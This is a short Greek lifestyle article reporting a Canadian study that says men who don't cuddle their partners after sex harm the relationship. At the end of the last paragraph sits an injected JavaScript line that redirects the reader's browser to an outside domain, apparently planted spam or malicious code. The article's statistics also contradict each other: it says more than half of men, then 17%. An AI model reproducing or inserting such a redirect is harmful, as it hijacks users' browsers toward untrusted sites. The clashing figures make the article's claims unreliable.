Το μεγάλο «λάθος» των ανδρών στο κρεβάτι

0
6

 

Σύμφωνα με έρευνα του Κέντρου Ενημέρωσης και Σεξουαλικής Επιμόρφωσης του Καναδά, οι άνδρες κάνουν ένα μεγάλο λάθος στο κρεβάτι και αυτό μπορεί ακόμα και να καταστρέψει τη σχέση τους.

Σύμφωνα με το «πόρισμα» περισσότεροι από τους μισούς άνδρες, δεν δείχνουν τρυφερότητα και δεν αγκαλιάζουν τη σύντροφό τους μετά το σεξ ή εάν το κάνουν, το κάνουν για λιγότερο από 5 λεπτά.

Είναι μία μορφή αγένειας που μπορεί να είναι καταστροφική για τον αυτοσεβασμό της γυναίκας και για τη σχέση, όπως αναφέρει η έρευνα

Από τους άνδρες που μετείχαν στην έρευνα, το 17% παραδέχθηκε ότι δεν αγκαλιάζει τη σύντροφό του μετά το σεξ, και αυτό αναδεικνύεται σε σοβαρό ζήτημα, σημαντικό όσο και τα ερωτικά παιχνίδια.

Ο επικεφαλής της έρευνας καθηγητής Robin Milhausen, είπε ότι είναι ένας απλός τρόπος για να επιβεβαιώνουν οι άνδρες τις συντρόφους τους.

«Είναι το πιο εύκολο πράγμα που μπορεί να κάνει κάποιος για να βελτιώσει τη σχέση του και είναι πραγματικά σημαντικό, αλλά συχνά χάνεται η ευκαιρία» λέει ο καθηγητής.

Η έρευνα Independent.co.uk αποκάλυψε ότι όταν συμβαίνει αυτό ενισχύεται η σεξουαλική ικανοποίηση της γυναίκας κατά 30%, ενώ και κάνει και τους άνδρες πιο ευτυχισμένους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here